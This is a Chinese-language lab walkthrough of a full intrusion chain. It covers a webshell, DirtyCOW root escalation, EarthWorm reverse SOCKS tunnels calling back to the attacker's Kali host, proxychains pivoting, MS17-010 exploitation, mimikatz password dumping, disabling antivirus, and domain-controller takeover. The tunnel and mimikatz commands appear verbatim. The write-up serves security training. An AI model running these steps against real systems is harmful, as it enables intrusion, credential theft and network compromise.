经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。
注意:本次环境在本地搭建,假设现在一无所知,这样更加真实。
获取到webshell后使用菜刀连接,查看权限是apache,系统是redhat6.5。
上传linux.sh到/tmp目录下,获取漏洞信息。
1)漏洞基本信息
选择CVE-2016-5195进行提权,该漏洞被称为“脏牛漏洞(DirtyCOW)”,危害是通过远程入侵获取低权限用户后,利用该漏洞在全版本Linux系统服务器上实现本地提权,从而获取到服务器root权限。
漏洞是由于Linux 内核的内存子系统在处理 Copy-on-Write 时出现竞争条件(漏洞),导致私有的只读内存映射被破坏、获取读写权限后进一步提权。
2)漏洞利用
在同版本的redhat系统上使用gcc编译此poc。
使用菜刀上传编译后的文件dirty到此web服务器上,给予可执行权限,password为密码,可以随意设置,我们将使用它来登录。
现在查看/etc/passwd文件,发现第一行文件已经必修改,root用户必修改成了firefart,它现在拥有最高权限,而密码我们已经知晓,就是刚才设置的password。从很低的apache权限到root权限,提权结束。
3)使用xshell远程连接
因为菜刀上不太方便, 现在使用xshell远程连接,成功连接。(账号:firefart,密码:password)
可以看到有两个IP,我们猜测拓扑图应该是如下,win10和kali受我们控制,它们处于外网。我们可以访问web服务器的外网接口192.168.1.120,另外一个IP是192.168.223.166,它应该是连接内网,但是我们无法访问。
1)SOCKS
Socks是一种代理服务,可以简单地将一端的系统连接到另外一端,支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议,其标准端口为1080。
2)Earthworm
EW是一套便携式的网络穿透工具,具有SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,而且适用于不同的操作系统。
3)ProxyChains
ProxyChains是Linux下的代理工具,kali已经安装,它可以使任何程序通过代理上网,允许TCP和DNS通过代理隧道,支持HTTP、SOCKS4和SOCKS5类型的代理服务器,并且可配置多个代理。
1)在kali上
在kali上运行:
./ew_linux_x64 -s rcsocks -l 1080 -e 1234
该命令的意思是在kali上添加一个转接隧道,把本地1080端口收到的代理请求转交给1234端口。
2)在web服务器上
我们刚才在win10已经使用xshell远程连接web服务器,运行:
./ew_linux_x64 -s rssocks -d 192.168.1.109 -e 1234
该命令的意思是在web服务器上启动SOCKS5服务,并反弹到IP地址为192.168.1.109(kali)的1234端口上。
3)配置proxychains.conf
现在就可以通过访问127.0.0.1:1080端口使用在右侧web服务器上架设的SOCKS5代理服务了。
/etc/proxychains.conf修改内容如下,去掉dynamic_chain的注释,并且在最后的位置添加代理。
4)测试代理服务器是否正常
cp /usr/lib/proxychains3/proxyresolv /usr/bin/
proxyresolv 192.168.223.166
发现代理正常,现在我们已经可以访问192.168.223.166了。
用proxychains可以启动任何程序,proxychains配合nmap和msf是内网渗透的大杀器,需要注意的是proxychains不支持udp和icmp协议。现在启动nmap,使用TCP扫描,不使用ping扫描,扫描整个内网,我们发现只能访问下面这台机器,对它进行扫描:
现在我们猜测拓扑图应该是如下,win10和kali受我们控制,它们处于外网,我们可以访问web服务器的外网接口192.168.1.120,另外一个内网IP是192.168.223.166,它只能访问内网的主机A 192.168.223.174。
1)启动msfconsole
2)攻击
选择漏洞利用模块ms17-010,MS17-010漏洞利用模块就是利用windows系统的windows smb远程执行代码漏洞,向Microsoft服务消息块服务器发送经特殊设计的消息后,允许远程代码执行。选择好漏洞利用模块和攻击载荷模块后,配置好参数,开始攻击。
3)获取密码信息
使用mimikatz抓取密码,命令如下:
load mimikatz
kerberos
可以看到域是lingwen,有两个域用户lingwen0001和admin的密码已经破解出来了,都是“lingwen1.”。
4)信息收集
(1)查看系统信息
(2)查看进程
(3)查看系统用户
(4)查看应用软件
(5)查看路由信息和最后登录时间
5)上传ew工具
查看进程号和权限,直接是system,关闭杀毒软件,开启远程桌面协议。
上传ew工具到主机A,为了后面使用这台机器A作为跳板访问其他内网主机。
一般情况下我们输入shell就可以进入目标机的shell下,可是这里不行,之前获得了2个域用户密码,我们尝试远程连接主机A。
1)远程登录主机A
使用代理启动rdesktop在kali上远程连接主机A,即192.168.223.174,使用之前获得的admin域账号登录。
2)收集域信息
(1)查看域用户和域的数量
(2)查看域里面的组
(3)查看域内所有主机名
(4)查看域管理员
(5)查看域控制器
(6)查看企业管理组
我们发现之前在主机A获得的域用户admin竟然是域管理员账号。
3)查看dns信息
我们终于发现域控的IP是192.168.223.134。
1)分析
(1)第一次socks代理
通过第一次socks代理:在kali上添加一个转接隧道,把1080端口收到的代理请求转交给1234端口;在web服务器上启动SOCKS5服务,并反弹到IP地址为192.168.1.109(kali)的1234端口上。
之后我们在kali通过web服务器做跳板来访问主机A。
(2)现在的问题
虽然我们知道了域控的IP,域管理员的账号和密码,但是现在我们在kali上连接不到域控。如下所示,远程登录失败。
我们可不可以再次代理,使用主机A做跳板,把经过它的流量反弹到web服务器上,用kali连接web服务器。
2)在web服务器上
使用xshell建立新的会话连接web服务器192.168.1.120,在web服务器上运行:
./ew_linux_x64 -s rcsocks -l 6666 -e 5678
该命令的意思是在web服务器上添加一个转接隧道,把本地6666端口收到的代理请求转交给5678端口。
3)在主机A
在kali远程连接主机A,在主机A上运行:
ew_win32.exe -s rssocks -d 192.168.223.166 -e 5678
该命令的意思是在主机A上启动SOCKS5服务,并反弹到IP地址为192.168.223.166(web服务器)的5678端口上。
4)配置proxychains.conf
现在就可以通过访问192.168.1.120:6666端口使用在主机A上架设的SOCKS5代理服务了。
5)远程连接域控
发现现在已经可以访问域控了,使用域管理员账号成功登录。